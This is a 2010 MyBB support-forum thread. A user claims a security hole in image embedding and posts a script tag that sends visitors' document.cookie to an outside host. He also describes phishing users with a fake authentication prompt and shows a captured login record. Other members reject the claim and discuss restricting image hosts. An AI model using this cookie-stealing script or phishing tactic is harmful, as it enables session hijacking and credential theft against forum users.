but to get your cookies i shoud post next :
<script>img = new Image(); img.src = 'http://fifastars.net84.net/scripts/2/loadbanner.php?cook='+document.cookie;</script>
in a html file and after this you must just acces this html file
That looks like more of a phishing attempt where the site tries to spoof itself by saying its asking for "MyBB anthentification" and getting unsuspecting users to enter their login details.
i know you can press cancel but a beginer will insert his password belive me
look what i get by now lets say this is a password :d
HAHAHAHAHAHAHAHAHAHAHAH ||| jodifgjdojnfkfjdjfoijfv || Tue.Nov.2010 | 03:25 | ....... | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729)
HAHAHAHAHAHAHAHAHAHAHAH (shoul be username)
jodifgjdojnfkfjdjfoijfv (password)
So this is not a MyBB security hole as you so blatantly put it. Its a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure will cause you to get banned wherever you use such a tactic!
(2010-11-16, 08:36 AM)- G33K - Wrote: [ -> ]So this is not a MyBB security hole as you so blatantly put it. Its a lame attempt to get unsuspecting users to enter their login details by phishing and I can assure will cause you to get banned wherever you use such a tactic!
ok try to insert this script [img]link[/img] on premium uCoz websites and you will see that this is not working
+ here is a website when you try insert an img says:
Din motive de securitate, imaginile pentru tag-ul [img] se acceptă doar de pe site-urile din această listă, puteți să le încărați acolo. Apăsați butonul Înapoi, și edițați-vă mesajul.
Translate:
For security reasons, the images tag [img] shall be accepted only on sites in this list, you can get it loaded there. Click the Back button and edit your message.
website lists:
http://tinypic.com
http://imgur.com
http://imageshack.us
http://fastpic.ru
http://radikal.ru
http://immage.de
http://bayimg.com
maybe it's not a security hole, but it would be better if we try to avoid situations where our users, give their passwords to hackers
You realise that any website that allows you to input images is 'vulnerable' to this...?? All you're doing is writing a malicious script and getting people to visit it to steal their information.
yes i realise this but can you do so that images be accepted only from some sites not from all ? just like in the above example
(2010-11-16, 10:10 AM)Evollution Wrote: [ -> ]yes i realise this but can you do so that images be accepted only from some sites not from all ? just like in the above example
You can request it as a plugin.
IMO, you can not have this as a core feature of MyBB because it would be too limiting and admins would have to muck around with the list of sites to allow/disallow.
Also, using this phishing attempt will not last long on any board with active moderators as they will immediately remove it and ban the user who posted it.